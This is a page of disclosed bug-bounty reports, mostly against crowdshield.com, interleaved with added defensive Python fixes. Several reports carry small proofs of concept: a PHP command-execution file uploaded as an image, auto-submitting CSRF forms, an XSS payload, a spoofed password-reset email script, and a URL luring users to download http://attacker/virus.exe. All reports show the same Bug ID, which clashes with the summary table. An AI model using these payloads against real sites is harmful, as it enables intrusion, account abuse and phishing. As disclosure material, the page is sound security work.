Reporting

Authentication Bypass

Severity: High
Bug ID: 703
Researcher: dia2diab
Status: Disclosed
Submitted: 07/01/2015

Description:

Authentication bypass at the activation code step

Affected URL:

https://crowdshield.com/account.php?hash=

Affected Params:

hash

Bug Evidence:

When I went to register on your web site, I found you sent me an activation URL in my email with a simple hash:

1- https://crowdshield.com/account.php?hash=c7e1249ffc03eb9ded908c236bd1996d
2- https://crowdshield.com/account.php?hash=55a7cf9c71f1c9c495413f934dd1a158
3- https://crowdshield.com/account.php?hash=24b16fede9a67c9251d3e7c7161c83ac

As you can see, the three activation URLs are for three email addresses, but the problem is that the hash value is the MD5 of a random number:

c7e1249ffc03eb9ded908c236bd1996d => md5(87)
55a7cf9c71f1c9c495413f934dd1a158 => md5(492)
24b16fede9a67c9251d3e7c7161c83ac => md5(372)

This lets an attacker register with any email on the internet that doesn't belong to him and activate the account on crowdshield.com the easy way.

A simple Python script that requests MD5 values as
https://crowdshield.com/account.php?hash=[PayLoad_here] 


Bug Recommendation:

I recommend making this hash more complicated.
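One way to issue activation tokens that cannot be enumerated the way the report describes, added here as an example and not CrowdShield's own code: a CSPRNG token, stored only as a hash, bound to the email address, single-use and time-limited. The `store` dict stands in for whatever database the site uses.

```python
# Added example (not CrowdShield's code): activation tokens drawn from a CSPRNG,
# stored only as a hash, bound to the email, single-use, and checked in constant time.
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 24 * 3600


def issue_activation_token(store, email, now=None):
    """Create an unguessable activation token for `email`.

    Returns the raw token to put in the activation link; `store` keeps only
    its SHA-256 digest, so a leaked table does not leak live tokens.
    """
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # 256 bits of entropy, not md5(small int)
    digest = hashlib.sha256(token.encode()).hexdigest()
    store[digest] = {"email": email, "expires": now + TOKEN_TTL_SECONDS, "used": False}
    return token


def verify_activation(store, email, token, now=None):
    """Return True (and burn the token) only if it is live and issued for `email`."""
    now = time.time() if now is None else now
    digest = hashlib.sha256(token.encode()).hexdigest()
    record = store.get(digest)
    if record is None:
        return False
    # constant-time compare so timing does not reveal how much of the email matched
    if not hmac.compare_digest(record["email"].encode(), email.encode()):
        return False
    if record["used"] or now > record["expires"]:
        return False
    record["used"] = True
    return True
```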

Privilege Escalation

Severity: High
Bug ID: 703
Researcher: poseidon
Status: Disclosed
Submitted: 08/24/2018

Description:

https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=WNFU87G7CPVAU&lc=US&item_name=Sn1per%20Professional&item_number=0001&amount=20%2e00&currency_code=USD&button_subtype=services&tax_rate=0%2e000&shipping=0%2e00&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHosted

The amount can be altered and it is not re-examined later.

Affected URL:

https://xerosecurity.com/ordering.html

Affected Params:

the link to paypal

Bug Evidence:

already provided to the head


Bug Recommendation:

Revalidate the payment amount before sending the license.
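The recommended server-side re-check, as an added example that is not XeroSecurity's code: before a license is issued, the payment notification is compared against the order the server itself created (item, amount, currency, receiving account) and the transaction id is tracked to stop replays. Field names follow PayPal's IPN variables; the notification dicts are constructed samples.

```python
# Added example (not XeroSecurity's code): verify a payment notification against
# the server-side order before fulfilling. Field names follow PayPal IPN variables.
from decimal import Decimal

EXPECTED_RECEIVER = "WNFU87G7CPVAU"  # business id taken from the report's button URL


class PaymentRejected(Exception):
    pass


def validate_payment(notification, order, seen_txn_ids):
    """Raise PaymentRejected unless `notification` matches `order` exactly.

    order: {"item_number": str, "amount": str like "20.00", "currency": str}
    seen_txn_ids: set of transaction ids already fulfilled (replay protection)
    Returns the transaction id on success.
    """
    if notification.get("payment_status") != "Completed":
        raise PaymentRejected("payment not completed")
    if notification.get("receiver_id") != EXPECTED_RECEIVER:
        raise PaymentRejected("paid to a different account")
    if notification.get("item_number") != order["item_number"]:
        raise PaymentRejected("item mismatch")
    # Re-examine the amount server-side: the amount in the button URL is client data.
    try:
        paid = Decimal(notification.get("mc_gross", "0"))
    except ArithmeticError:  # decimal.InvalidOperation on garbage input
        raise PaymentRejected("unparseable amount")
    if paid != Decimal(order["amount"]) or notification.get("mc_currency") != order["currency"]:
        raise PaymentRejected("amount or currency altered")
    txn_id = notification.get("txn_id")
    if not txn_id or txn_id in seen_txn_ids:
        raise PaymentRejected("missing or replayed transaction id")
    seen_txn_ids.add(txn_id)
    return txn_id
```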

Privilege Escalation

Severity: High
Bug ID: 703
Researcher: daksh
Status: Disclosed
Submitted: 12/05/2014

Description:

As I reported earlier about privilege escalation in the comment section, where I was able to comment on behalf of the bounty admin, you fixed it. But I think it is not fixed entirely.

Affected URL:

https://crowdshield.com/dashboard.php?bug_id=[ID]

Affected Params:

sent_from

Bug Evidence:

bug_id=538&researcher_username=daksh&bug_category=Cross+Site+Request+Forgery&bounty_name=CrowdShield&sent_from=researcher&bug_comment=test&bug_reply=Reply

All you need to do is change it to sent_from=bounty and the comment will be made on behalf of the bounty admin.


Bug Recommendation:

I think you should remove that parameter.
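A server-side version of the comment handler, added here as an example and not CrowdShield's code: the commenter's role is taken from the authenticated session and the user's relationship to the bug, so a client-supplied `sent_from` value has no effect. The `BUGS` and `BOUNTY_ADMINS` tables are constructed sample data.

```python
# Added example (not CrowdShield's code): the role recorded on a comment comes
# from the server-side session, never from the `sent_from` form field.
BUGS = {  # constructed sample data: bug id -> owning researcher and bounty program
    538: {"researcher": "daksh", "bounty": "CrowdShield"},
}
BOUNTY_ADMINS = {"CrowdShield": "crowdshield_admin"}  # constructed sample data


def add_comment(session, form, bugs=BUGS, admins=BOUNTY_ADMINS):
    """Build a comment record; form["sent_from"] is deliberately ignored."""
    bug_id = int(form["bug_id"])
    bug = bugs.get(bug_id)
    if bug is None:
        raise LookupError("no such bug")
    user = session["username"]
    # Decide the role from who the user is, not from what the request claims.
    if session["role"] == "researcher" and bug["researcher"] == user:
        sent_from = "researcher"
    elif session["role"] == "bounty" and admins.get(bug["bounty"]) == user:
        sent_from = "bounty"
    else:
        raise PermissionError("user may not comment on this bug")
    return {
        "bug_id": bug_id,
        "author": user,
        "sent_from": sent_from,
        "comment": form.get("bug_comment", ""),
    }
```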

Privilege Escalation

Severity: High
Bug ID: 703
Researcher: realn0j
Status: Disclosed
Submitted: 09/06/2017

Description:

Loading the blog page with an invalid post name results in a comment box being displayed to all users above the list of posts. Authenticated users may submit comments to this which are stored and displayed in the list of blog posts. All invalid 'name' parameter submissions appear to affect a single comment thread which is displayed on any page with an invalid name given.

Affected URL:

https://crowdshield.com/blog.php?name=

Affected Params:

name

Bug Evidence:

Evidence and steps to reproduce provided to @1N3 via Slack.


Bug Recommendation:

Check for valid ?name parameter before displaying the comment box or accepting comment submissions. As a sanity check, check database regularly for orphaned comments.

Screenshot:



Remote Code Execution

Severity: High
Bug ID: 703
Researcher: zoczus
Status: Disclosed
Submitted: 05/06/2015

Description:

Remote Code Execution in file uploads

Affected URL:

https://crowdshield.com

Affected Params:

N/A

Bug Evidence:

Hi,

I've just found an RCE bug in your server.

https://crowdshield.com/uploads/rce.php.jpg - this one executes normally, as PHP. :-)

Code:
<?php
system("uname -a");
phpinfo();
?>



Bug Recommendation:

Not sure what your /etc/mime.types looks like, but if there's no jpg extension, Apache can probably behave just like this. Waiting for some feedback and bounty. :) Have a nice day! Jakub Zoczek
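An upload filter for the double-extension case above, added as an example and not CrowdShield's code. Apache's mod_mime treats every dotted segment of a filename as an extension, so a name like rce.php.jpg can still reach the PHP handler when .php is mapped with AddHandler/AddType; the check below accepts exactly one allow-listed extension, confirms the file's leading bytes match it, and replaces the user-supplied name with a random one. The magic-byte table is a constructed lookup for the allowed formats.

```python
# Added example (not CrowdShield's code): accept a single allow-listed image
# extension, verify the content's leading bytes, and discard the original name.
import secrets

ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
MAGIC = {  # constructed lookup: leading bytes -> canonical extension
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


class UploadRejected(Exception):
    pass


def sniff_type(data):
    """Return the canonical extension implied by the file header, or None."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def safe_upload_name(original_name, data):
    """Return a server-chosen filename for the upload, or raise UploadRejected."""
    base = original_name.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    parts = base.lower().split(".")
    # Exactly "<name>.<ext>": no leading dot (.htaccess), no "x.php.jpg".
    if len(parts) != 2 or not parts[0] or parts[1] not in ALLOWED_IMAGE_EXTENSIONS:
        raise UploadRejected("filename must be <name>.<jpg|jpeg|png|gif>")
    ext = "jpg" if parts[1] == "jpeg" else parts[1]
    if sniff_type(data) != ext:
        raise UploadRejected("content does not match extension")
    # The stored name carries no user-controlled bytes at all.
    return f"{secrets.token_hex(16)}.{ext}"
```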

Buffer Overflow

Severity: Medium
Bug ID: 703
Researcher: rockcena
Status: Disclosed
Submitted: 12/01/2014

Description:

Hello team, I found broken authentication that leads to a character limit bypass.

Affected URL:

http://crowdshield.com/

Affected Params:

ISC2

Bug Evidence:

For example:

I found an ISC2 character limit bypass.

The character limit is 60, so now I bypass it to 100 characters:

1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890

Now I put in 100 characters:

https://www.youtube.com/watch?v=vMJRBUmHBmQ

Note: it's an unlisted video.
 
Now there are more than 100 characters there, but the limit is 60 :p

Fix it soon.

Regards,
sarath


Bug Recommendation:

Validate server side properly.

Cross Site Request Forgery

Severity: Medium
Bug ID: 703
Researcher: sandeepv
Status: Disclosed
Submitted: 11/30/2014

Description:

Forging login requests: an attacker can monitor the victim's actions. An attacker may forge a request to log the victim into a target website using the attacker's credentials; this is known as login CSRF. Login CSRF makes various novel attacks possible; for instance, an attacker can later log into the site with his legitimate credentials and view private information like activity history that has been saved in the account.

Affected URL:

http://crowdshield.com/login.php

Affected Params:

username , password

Bug Evidence:

<html>
  <body>
    <form action="http://crowdshield.com/login.php" method="POST">
      <input type="hidden" name="username" value="user" />
      <input type="hidden" name="password" value="pass123" />
      <input type="hidden" name="submit" value="Login" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Bug Recommendation:

Implement CSRF tokens in both cookies and POST requests. This restricts some token bypasses.

Cross Site Request Forgery

Severity: Medium
Bug ID: 703
Researcher: sandeepv
Status: Disclosed
Submitted: 11/30/2014

Description:

The CSRF protection is not implemented for reporting a new bug. So the attacker can take advantage of this to send a CSRF link to the victim to post a bug on the victim's behalf. Here the attacker can write any abuse about the program to reduce the tester's reputation.

Affected URL:

http://crowdshield.com/report_bug_new.php

Affected Params:

Bug submission

Bug Evidence:

<html>
  <body>
    <form action="http://crowdshield.com/report_bug_new.php" method="POST">
      <input type="hidden" name="affected_url" value="sdf" />
      <input type="hidden" name="affected_params" value="dsf" />
      <input type="hidden" name="bug_description" value="dsfdsfffffffffffffffffffffffffffffffffffffffffffffdvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv                             sdggggggggggggggg" />
      <input type="hidden" name="bug_evidence" value="dsf        wertwetrwt" />
      <input type="hidden" name="bug_recommendation" value="dsf      ewrtretret" />
      <input type="hidden" name="bug_category" value="Cross&#32;Site&#32;Scripting" />
      <input type="hidden" name="submit_bug" value="Submit&#32;Bug" />
      <input type="hidden" name="bounty_id" value="12" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Bug Recommendation:

Implement CSRF tokens in both cookies and POST requests. This restricts some token bypasses.
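The "token in both cookie and POST body" recommendation that both CSRF reports above make, worked through as an added example that is not CrowdShield's code: the token is a nonce plus an HMAC over the session id, so a forged page cannot mint one, and the form copy must equal the cookie copy. `SERVER_SECRET` is an assumed server-side key; `handle_report_bug` is a stand-in for the report_bug_new.php handler.

```python
# Added example (not CrowdShield's code): double-submit CSRF token bound to the
# session with an HMAC, checked in constant time before a state-changing action.
import hashlib
import hmac
import secrets

SERVER_SECRET = b"constructed-server-secret-rotate-in-production"  # assumed key


def _sign(session_id, nonce):
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id):
    """Token to set in a cookie and to embed in the form as a hidden field."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_sign(session_id, nonce)}"


def check_csrf(session_id, cookie_token, form_token):
    """True only if cookie and form carry the same token signed for this session."""
    if not cookie_token or not form_token:
        return False
    if not hmac.compare_digest(cookie_token.encode(), form_token.encode()):
        return False
    nonce, _, mac = form_token.partition(".")
    if not nonce or not mac:
        return False
    return hmac.compare_digest(mac.encode(), _sign(session_id, nonce).encode())


def handle_report_bug(session_id, cookies, form):
    """Gate the bug-submission action on the CSRF check; returns (status, message)."""
    if not check_csrf(session_id, cookies.get("csrf"), form.get("csrf")):
        return 403, "CSRF token missing or invalid"
    return 200, "bug submitted"
```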

Reflected Cross Site Scripting

Severity: Medium
Bug ID: 703
Researcher: pratap
Status: Disclosed
Submitted: 12/16/2014

Description:

An XSS vulnerability exists in the account page. Steps to reproduce:

1. Click on create a researcher account.
2. Select the username as <script>alert(1);</script>
3. Click on create account. When the successful creation page is displayed, click on the browser back button.
4. Reload the page and the XSS is triggered.

Affected URL:

http://crowdshield.com/account.php

Affected Params:

researcher_username

Bug Evidence:

POST /account.php HTTP/1.1
Host: crowdshield.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://crowdshield.com/account.php
Cookie: __cfduid=d022fe4a4b859e83f2a384005c5dceb521418758454; PHPSESSID=8jet0csoiucsoiucj7qkfk7uv6; __utma=242435792.217988264.1418758459.1418758459.1418758459.1; __utmb=242435792.48.10.1418758459; __utmc=242435792; __utmz=242435792.1418758459.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.217988264.1418758459; __utmt=1; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315

researcher_email=pratap.14692%40gmail.com&researcher_username=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password1=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password2=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_terms=accept&submit=Create+Account&create_account=researcher&captcha=36




Bug Recommendation:

Sanitize evil input.

Application Errors

Severity: Low
Bug ID: 703
Researcher: guifre
Status: Disclosed
Submitted: 07/29/2017

Description:

Content spoofing & text injection on crowdshield.com. Content spoofing is an attack technique that allows an attacker to inject a malicious payload that is later misrepresented as legitimate content of a web application. This approach is common on error pages, or sites providing story or news entries. The content specified in this parameter is later reflected into the page to provide the content for the page. If an attacker were to replace this content with something more sinister they might be able to falsify statements on the destination website. Upon visiting this link the user would believe the content being displayed is legitimate.

Affected URL:

http://crowdshield.com/%20needs%20a%20new%20web%20client%2c%20please%20download%20http%3a%2f%2fattacker%2fvirus.exe%20to%20we%20able%20to%20open%20it.%20Your%20browser%20compatible%20plugin

Affected Params:

n/a

Bug Evidence:

Hi,

I get in touch to report that crowdshield.com is vulnerable to content spoofing and text injection.


This attack exploits the trust relationship established between the user and the web site.


PoC
http://crowdshield.com/%20needs%20a%20new%20web%20client%2c%20please%20download%20http%3a%2f%2fattacker%2fvirus.exe%20to%20we%20able%20to%20open%20it.%20Your%20browser%20compatible%20plugin

The URL path is URL decoded and attacker text is reflected back to the UI:

"The requested URL / needs a new web client, please download http://attacker/virus.exe to we able to open it."

Please, let me know if you need further information

Best Regards,
Guifre.


Bug Recommendation:

Use a 404 page that doesn't include attacker text.

Session Security and Cookies

Severity: Low
Bug ID: 703
Researcher: testingcs
Status: Disclosed
Submitted: 04/24/2016

Description:

SESSION TAKEOVER bug in CROWDSHIELD. In this bug even after changing the password, user's session DOES NOT EXPIRE on other devices.

Affected URL:

https://crowdshield.com

Affected Params:



Bug Evidence:

Steps to Reproduce the BUG:

1) I logged into two different browsers with the same password (the password is qwertyuiop2)
2) Now I am changing the password in one of the browsers (the new password is qwertyuiop3)
3) NOW EVEN AFTER CHANGING THE PASSWORD MY SESSION IN THE OTHER BROWSER IS STILL ALIVE.

The DANGER associated with this bug is that an ATTACKER can hijack the session and account of the VICTIM.


Bug Recommendation:

MUST EXPIRE THE SESSION AS SOON AS THE USER LOGS OUT.

Video:


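One server-side pattern that closes the gap in the report above (a password change that leaves sessions in other browsers alive), added as an example and not CrowdShield's code: each user record carries a session generation counter, every session stores the generation it was minted under, and a password change bumps the counter, so all older sessions fail their next request while the session that made the change is kept. `USERS` and `SESSIONS` are in-memory stand-ins for the site's storage.

```python
# Added example (not CrowdShield's code): revoke every other session of a user
# when the password changes, via a per-user session generation counter.
import secrets

USERS = {}     # username -> {"pw_hash": str, "generation": int}   (constructed store)
SESSIONS = {}  # session id -> {"user": str, "generation": int}    (constructed store)


def register(username, pw_hash):
    USERS[username] = {"pw_hash": pw_hash, "generation": 0}


def login(username):
    """Mint a session that remembers the user's generation at login time."""
    sid = secrets.token_urlsafe(24)
    SESSIONS[sid] = {"user": username, "generation": USERS[username]["generation"]}
    return sid


def current_user(sid):
    """Return the username for a live session, or None if it has been revoked."""
    s = SESSIONS.get(sid)
    if s is None:
        return None
    if s["generation"] != USERS[s["user"]]["generation"]:
        SESSIONS.pop(sid)  # stale: issued before a password change or logout-all
        return None
    return s["user"]


def change_password(sid, new_pw_hash):
    """Update the password and invalidate all sessions except the calling one."""
    user = current_user(sid)
    if user is None:
        raise PermissionError("not logged in")
    USERS[user]["pw_hash"] = new_pw_hash
    USERS[user]["generation"] += 1
    SESSIONS[sid]["generation"] = USERS[user]["generation"]  # keep this browser's session


def logout_everywhere(sid):
    """Same mechanism for an explicit 'log out of all devices' action."""
    user = current_user(sid)
    if user is None:
        raise PermissionError("not logged in")
    USERS[user]["generation"] += 1
```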

Other

Severity: Informational
Bug ID: 703
Researcher: zediwon
Status: Disclosed
Submitted: 09/28/2015

Description:

Hi, it is possible to learn the title, affected parameter and URL of bugs reported by other researchers via a simple bug.

Affected URL:

https://crowdshield.com/report_bug.php

Affected Params:

all

Bug Evidence:

Scenario:

    Researcher uses a shared computer.
    Researcher submits a report.
    Researcher logs out.
    Another person logs in, on another account.
    Another person submits a report.
    When entering a title, the title of the previous report submitted by the researcher is shown in autocompletion box.

This gives away the title, report url & affected parameter of the bug to other users of the web browser, even though the researcher logged out properly.


Bug Recommendation:

Simple: put autocomplete="off" on the <input> elements.

Other

Severity: Informational
Bug ID: 703
Researcher: behroz
Status: Disclosed
Submitted: 10/06/2015

Description:

I checked the SPF records for www.crowdshield.com, where in the DNS resource records the MX record for crowdshield.com can be spoofed easily, or even an SMTP relay can result in sending unauthorized emails from the crowdshield.com mail domain.

Affected URL:

https://crowdshield.com

Affected Params:



Bug Evidence:

POC

An SMTP relay can easily send an unauthorized email from "anything"@crowdshield.com, for example [email protected], stating that due to security reasons please re-enter your password, or it may say that you have been rewarded by crowdshield.com and to get the reward please click below. A normal user will believe it as it is from the crowdshield.com mail server; therefore, the user would blindly believe it and fall for this trick.

After the user clicks the link there are many devastating possibilities which can be achieved by the attacker, who would spoof as an authentic crowdshield.com person.

For example, the PHP language can be used to send email from the crowdshield.com domain. SMTP relay is possible:

<?php
$to = "[email protected]";
$subject = "Change your Password ";
$txt = "Change your password by visiting here - [VIRUS LINK HERE]";
$headers = "From: [email protected]";
mail($to,$subject,$txt,$headers);
?>


Bug Recommendation:

When the user clicks the link, the user would be redirected to the attacker's website, which may result in stealing the crowdshield.com account session ID; hence a session would be hijacked and the attacker would easily get access to the victim's account, therefore he could read public + private information for that particular account. As the problem was in your mail exchange server, it would impact you in "reputation loss" as customers would lose faith in you, hence reducing your productivity. In fact, if the attacker is even more evil then the user might get infected in a bad way: after clicking on the attacker's link, a trojan would get installed on the victim's system which would create a back door for the attacker to remotely access his system, and there are other devastating possibilities as well.

If you need a checksum for this vulnerability you could use one of the email spoofing tools that are available online. I tried to send from [email protected] to my email address to verify; I received an email from [email protected].

Your SPF record for crowdshield.com:

v=spf1 include:spf.mandrillapp.com ?all

It should be:

v=spf1 include:spf.mandrillapp.com -all

In your SPF record you should replace ? with - at the end, before all. - is strict, which prevents all spoofed emails except if you are sending. Your bug is that you are using ?, you should use -.

Screenshot:


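A small audit check for the SPF point made in the report above, added as an example and not the researcher's code: it parses an SPF TXT record string and reports whether the "all" qualifier leaves unlisted senders accepted (+all, ?all, or no all term) or rejected (-all, ~all). Fetching the TXT record is left to the caller; the sample records are constructed.

```python
# Added example (not the researcher's code): classify the "all" qualifier of an
# SPF record. Unlisted senders are only refused by -all (fail) or ~all (softfail).
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(record):
    """Return (ok, explanation) for an SPF TXT record string.

    ok is True only when mail from unlisted senders will fail or softfail.
    """
    terms = record.strip().split()
    if not terms or terms[0].lower() != "v=spf1":
        return False, "not an SPF version 1 record"
    # Only the first 'all' matters: mechanisms after it are never evaluated.
    for term in terms[1:]:
        qualifier, name = ("+", term) if term[0] not in QUALIFIERS else (term[0], term[1:])
        if name.lower() != "all":
            continue
        result = QUALIFIERS[qualifier]
        if result in ("fail", "softfail"):
            return True, f"{qualifier}all: unlisted senders {result}"
        return False, f"{qualifier}all: unlisted senders get '{result}', spoofing is not refused"
    return False, "no 'all' term: unlisted senders default to neutral"


def audit(records):
    """Map each constructed (domain, record) pair to its verdict."""
    return {domain: check_spf(rec) for domain, rec in records}
```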

Pending Bugs

ID   Severity       Vulnerability                   User       Date        Status
692  High           Authentication Bypass           dia2diab   07/01/2015  Disclosed
778  High           Privilege Escalation            poseidon   08/24/2018  Disclosed
641  High           Privilege Escalation            daksh      12/05/2014  Disclosed
744  High           Privilege Escalation            realn0j    09/06/2017  Disclosed
670  High           Remote Code Execution           zoczus     05/06/2015  Disclosed
593  Medium         Buffer Overflow                 rockcena   12/01/2014  Disclosed
578  Medium         Cross Site Request Forgery      sandeepv   11/30/2014  Disclosed
580  Medium         Cross Site Request Forgery      sandeepv   11/30/2014  Disclosed
659  Medium         Reflected Cross Site Scripting  pratap     12/16/2014  Disclosed
742  Low            Application Errors              guifre     07/29/2017  Disclosed
724  Low            Session Security and Cookies    testingcs  04/24/2016  Disclosed
706  Informational  Other                           zediwon    09/28/2015  Disclosed
707  Informational  Other                           behroz     10/06/2015  Disclosed